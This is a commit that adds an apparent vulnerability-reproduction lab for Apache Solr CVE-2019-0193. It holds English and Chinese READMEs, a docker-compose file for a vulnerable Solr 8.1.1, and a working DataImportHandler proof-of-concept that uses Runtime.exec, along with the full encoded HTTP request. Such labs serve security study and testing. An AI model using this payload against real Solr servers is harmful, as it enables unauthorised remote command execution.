first commit

solr/CVE-2019-0193/README.md

@@ -0,0 +1,66 @@
+# Apache Solr Remote Command Execution (CVE-2019-0193)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. It is written in Java and built upon Apache Lucene. This vulnerability exists in Apache Solr's DataImportHandler, which is an optional but commonly used module for extracting data from databases and other sources. The vulnerability arises because all DIH configurations can be set through the dataConfig parameter in external requests. Since DIH configurations can contain scripts, attackers can execute remote commands by constructing malicious requests.
+
+References:
+
+- <https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA>
+- <https://paper.seebug.org/1009/>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 8.1.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`. No authentication is required.
+
+## Vulnerability Reproduction
+
+First, select the `demo` core from the left sidebar, open the Dataimport panel, enable Debug mode on the right, and enter the following POC:
+
+```
+<dataConfig>
+  <script><![CDATA[
+          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
+          }
+  ]]></script>
+  <document>
+    <entity name="sample"
+            fileName=".*"
+            baseDir="/"
+            processor="FileListEntityProcessor"
+            recursive="false"
+            transformer="script:poc" />
+  </document>
+</dataConfig>
+```
+
+![](1.png)
+
+Click "Execute with this Configuration" to send the following request:
+
+```
+POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
+Host: your-ip:8983
+Content-Length: 613
+Accept: application/json, text/plain, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-type: application/x-www-form-urlencoded
+Origin: http://your-ip:8983
+Referer: http://your-ip:8983/solr/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Connection: close
+
+command=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
+```
+
+Execute `docker compose exec solr ls /tmp` to enter the container, and you can see that `touch /tmp/success` has been successfully executed:
+
+![](2.jpg)

solr/CVE-2019-0193/README.zh-cn.md

@@ -0,0 +1,64 @@
+# Apache Solr 远程命令执行漏洞（CVE-2019-0193）
+
+Apache Solr 是一个开源的搜索服务器。它使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在 Apache Solr 的 DataImportHandler，该模块是一个可选但常用的模块，用于从数据库和其他源中提取数据。它具有一个功能，其中所有的 DIH 配置都可以通过外部请求的 dataConfig 参数来设置。由于 DIH 配置可以包含脚本，因此攻击者可以通过构造危险的请求，从而造成远程命令执行。
+
+参考链接：
+
+- <https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA>
+- <https://paper.seebug.org/1009/>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 8.1.1 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理页面，无需登录。
+
+## 漏洞复现
+
+首先在页面左侧选择 `demo` 核心，打开 Dataimport 面板，开启右侧 Debug mode，填入以下 POC：
+
+```
+<dataConfig>
+  <script><![CDATA[
+          function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/success");
+          }
+  ]]></script>
+  <document>
+    <entity name="sample"
+            fileName=".*"
+            baseDir="/"
+            processor="FileListEntityProcessor"
+            recursive="false"
+            transformer="script:poc" />
+  </document>
+</dataConfig>
+```
+
+![](1.png)
+
+点击 "Execute with this Configuration" 会发送以下请求：
+
+```
+POST /solr/demo/dataimport?_=1708782956647&indent=on&wt=json HTTP/1.1
+Host: your-ip:8983
+Content-Length: 613
+Accept: application/json, text/plain, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-type: application/x-www-form-urlencoded
+Origin: http://your-ip:8983
+Referer: http://your-ip:8983/solr/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Connection: close
+
+command=full-import&verbose=false&clean=false&commit=true&debug=true&core=demo&dataConfig=%3CdataConfig%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22sample%22%0A++++++++++++fileName%3D%22.*%22%0A++++++++++++baseDir%3D%22%2F%22%0A++++++++++++processor%3D%22FileListEntityProcessor%22%0A++++++++++++recursive%3D%22false%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
+```
+
+执行 `docker compose exec solr ls /tmp` 进入容器，可以看到 `touch /tmp/success` 已成功执行：
+
+![](2.jpg)

solr/CVE-2019-0193/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:8.1.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"